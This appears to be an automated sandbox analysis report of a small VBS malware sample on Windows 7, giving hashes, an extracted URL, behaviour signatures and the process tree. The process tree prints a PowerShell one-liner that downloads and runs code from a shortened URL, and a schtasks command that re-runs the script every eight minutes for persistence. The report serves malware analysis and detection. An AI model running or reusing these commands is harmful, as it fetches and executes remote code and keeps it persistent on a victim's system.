Analysis
-
max time kernel
118s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
06-09-2024 10:56
Static task
static1
Behavioral task
behavioral1
Sample
cf63d0b15d5d11efe96b97b75ec9e767_JaffaCakes118.vbs
Resource
win7-20240903-en
General
-
Target
cf63d0b15d5d11efe96b97b75ec9e767_JaffaCakes118.vbs
-
Size
1KB
-
MD5
cf63d0b15d5d11efe96b97b75ec9e767
-
SHA1
7bc07ee8846a857df1212d808c968a357104965c
-
SHA256
69a7fd5ba6e543deeba3bc302c5cde78e0e089e95b28a86a46783d5db0f8c683
-
SHA512
0f65c743989ce23c419865aec2bdb5ad23878015b9bca8fd140843bb3a77ea7f04652f7b105e758ee5a0b9f3a20743896af0c4ee3b65656df855056bad9efdc0
Malware Config
Extracted
http://bit.ly/2XDPsZ6
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
Powershell.exeflow pid Process 5 2680 Powershell.exe 7 2680 Powershell.exe 8 2680 Powershell.exe -
Drops startup file 1 IoCs
Processes:
WScript.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SysStartup.vbe WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Powershell.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Powershell.exepid Process 2680 Powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid Process Token: SeDebugPrivilege 2680 Powershell.exe -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
WScript.exedescription pid Process procid_target PID 940 wrote to memory of 2680 940 WScript.exe 31 PID 940 wrote to memory of 2680 940 WScript.exe 31 PID 940 wrote to memory of 2680 940 WScript.exe 31 PID 940 wrote to memory of 2680 940 WScript.exe 31 PID 940 wrote to memory of 2336 940 WScript.exe 33 PID 940 wrote to memory of 2336 940 WScript.exe 33 PID 940 wrote to memory of 2336 940 WScript.exe 33 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cf63d0b15d5d11efe96b97b75ec9e767_JaffaCakes118.vbs"1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:940 -
C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe"C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit -C $cry = new-object Net.WebClient;iex $cry.DownloadString('http://bit.ly/2XDPsZ6')2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2680
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 8 /tn localhost /tr "C:\Users\Admin\AppData\Roaming\cf63d0b15d5d11efe96b97b75ec9e767_JaffaCakes118.vbs2⤵
- Scheduled Task/Job: Scheduled Task
PID:2336
-